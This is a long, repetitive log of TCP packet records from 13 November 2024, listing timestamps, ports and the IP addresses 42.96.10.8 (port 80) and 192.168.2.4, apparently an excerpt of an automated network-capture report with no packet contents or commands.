                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170331955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170336008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170336008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170342922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170348883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170361996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170372009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170378923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170387030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170389891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170409918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170413971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170413971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170418978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170428991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170437098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170463085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170492887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170502901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170506954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170511007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170627117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170635939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170644999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170655012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170656919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170664072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170672894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170681000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170707941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170707941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170744896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170881033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170890093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170898914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170908928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.170918941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171061039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171061039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171093941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171106100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171123981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171133995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171144009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171154976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171164989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171174049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171190977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171190977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171238899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171247959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171257973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171267033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171274900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171274900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171276093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171287060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171297073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171309948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171314955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171323061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171366930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171389103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171406031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171421051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171422005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171432018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171442986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171452045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171462059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171472073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171472073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171472073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171477079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171487093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171497107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171504974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171518087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171528101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171533108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171533108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171556950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171566010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171575069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171585083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171593904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171596050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171596050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171605110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171627045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171637058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171644926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171648026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171648026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171660900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171675920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171684980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171684980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171684980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171696901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171705961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171715975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171726942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171736956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171746016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171757936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171757936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171757936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171818972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171828032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171835899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171843052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171843052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171845913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171857119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171866894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171875954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171900988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171900988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171936035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171945095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171953917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171962976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171968937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.171983957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172070980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172071934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172082901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172091961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172102928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172112942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172123909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172132969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172138929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172138929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172142029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172151089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172161102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172169924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172179937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172179937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172180891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172189951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172214031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172214031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172286034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172296047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172305107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172313929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172323942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172333956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172337055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172358036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172358036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172415018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172422886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172431946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172442913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172452927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172462940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172487020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172507048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172517061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172525883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172535896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172545910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172554016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172554016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172554016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172563076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172569036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172573090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172646046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172646046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172652006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172662020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172669888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172693014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172703028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172710896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172719955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172722101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172722101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172729015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172739983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172749996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172751904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172751904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172760963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172770023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172794104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172794104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172919989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.172929049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173100948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173258066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173265934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173274994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173276901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173284054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173321009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173321009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173360109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173369884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173377991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173398018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173408031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.173409939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174177885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174304962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174314022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174324036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174334049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174411058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174420118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174429893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174432039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174438953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174448967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174458027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174474001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174484968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174485922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174495935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174504995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174515009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174525976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174535990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174556971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174556971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174597025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174607038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174617052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174626112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174637079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174639940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174645901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174669027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174669027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174678087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174686909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174695969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174705982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174715996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174726009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174784899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174799919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174803019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174810886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174819946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174829960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174840927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174849033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174859047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174863100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174863100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174890995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174900055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174910069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174917936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174927950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174937963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174947977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174951077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174951077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174957991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174962997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174967051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.174987078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175353050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175362110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175390959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175400019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175405025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175405025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175410032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175420046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175430059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175438881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175447941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175448895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175460100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175470114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175476074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175479889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175507069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175515890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175515890 CET4973380192.168.2.442.96.10.8
